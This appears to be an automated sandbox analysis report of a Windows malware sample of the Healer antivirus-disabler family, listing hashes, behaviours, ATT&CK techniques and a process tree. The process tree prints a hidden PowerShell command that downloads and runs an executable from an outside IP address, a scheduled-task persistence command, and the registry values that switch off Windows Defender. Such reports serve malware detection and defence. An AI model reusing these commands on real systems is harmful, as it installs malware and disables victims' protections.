Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
18-02-2025 21:53
Static task
static1
Behavioral task
behavioral1
Sample
3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe
Resource
win7-20241010-en
General
-
Target
3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe
-
Size
938KB
-
MD5
f8363b39122ec442ddf9d5064da011dd
-
SHA1
edc3a725b2e83e15d7f002b8fd249348e7725737
-
SHA256
3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390
-
SHA512
e9e4eb4675ab3f5ec8653f5b131b3d2f4c74b4bf2208fceecf87b707e54adbb8107b5ce4f3339297e88f58aaf1bce46ed1631ae03e99f8143672e1c264392a3c
-
SSDEEP
24576:6qDEvCTbMWu7rQYlBQcBiT6rprG8aeKl:6TvC/MTQYxsWR7aeK
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2708-14-0x0000000000A60000-0x0000000000ECC000-memory.dmp healer behavioral1/memory/2708-15-0x0000000000A60000-0x0000000000ECC000-memory.dmp healer behavioral1/memory/2708-18-0x0000000000A60000-0x0000000000ECC000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2960 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2960 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 4 2960 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
Executes dropped EXE 1 IoCs
pid Process 2708 TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
Loads dropped DLL 2 IoCs
pid Process 2960 powershell.exe 2960 powershell.exe -
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2708 TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2836 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2708 TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE 2708 TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE 2708 TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2960 powershell.exe Token: SeDebugPrivilege 2708 TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2776 wrote to memory of 2848 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 30 PID 2776 wrote to memory of 2848 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 30 PID 2776 wrote to memory of 2848 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 30 PID 2776 wrote to memory of 2848 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 30 PID 2776 wrote to memory of 2852 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 31 PID 2776 wrote to memory of 2852 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 31 PID 2776 wrote to memory of 2852 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 31 PID 2776 wrote to memory of 2852 2776 3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe 31 PID 2848 wrote to memory of 2836 2848 cmd.exe 33 PID 2848 wrote to memory of 2836 2848 cmd.exe 33 PID 2848 wrote to memory of 2836 2848 cmd.exe 33 PID 2848 wrote to memory of 2836 2848 cmd.exe 33 PID 2852 wrote to memory of 2960 2852 mshta.exe 34 PID 2852 wrote to memory of 2960 2852 mshta.exe 34 PID 2852 wrote to memory of 2960 2852 mshta.exe 34 PID 2852 wrote to memory of 2960 2852 mshta.exe 34 PID 2960 wrote to memory of 2708 2960 powershell.exe 36 PID 2960 wrote to memory of 2708 2960 powershell.exe 36 PID 2960 wrote to memory of 2708 2960 powershell.exe 36 PID 2960 wrote to memory of 2708 2960 powershell.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe"C:\Users\Admin\AppData\Local\Temp\3522d8fe0b3cb7126fcf9ab74405cd6bc29a93001bc23854941d90fc7fcf3390.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Tk6Y4ma2Yzf /tr "mshta C:\Users\Admin\AppData\Local\Temp\iaruH3oP3.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Tk6Y4ma2Yzf /tr "mshta C:\Users\Admin\AppData\Local\Temp\iaruH3oP3.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2836
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\iaruH3oP3.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Users\Admin\AppData\Local\TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE"C:\Users\Admin\AppData\Local\TempNGBFWVIE691TLS0A1DW3KFKNQI2Q9X2B.EXE"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
6Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
726B
MD5f28ca9a060f96d255797e12ae6811a50
SHA1ffbef223a2b4e602822d171f610fe1b2e2975f8d
SHA25699976274136387ac6da3ddb38770a609d37975cc8a2658052383f41477da7e55
SHA5126b28b3d33de582147959c03e4054587efb88e2f5c95d54c5a6058c96306b1d8825537b7556ed3b9604dbd7f51ada232998a7bb509037bc76001ce3398793bb64
-
Filesize
1.7MB
MD57484497cd31ac2475808772a30efd8fa
SHA16e1e52d91ec5789bc69ef7a558482bb309b4941d
SHA2564532c7f02d37367f66b795ae3f7e1b84fb1d99e7ec10babeb696a1dc35d371dd
SHA5128ea28fe59f941b2fb9c6112bae5df59b249280daaa909b968411ed4b95fe23a041194ac26ea9d3ac4a628197960a44e46825e29a9ee9042c12acec7a16d228ce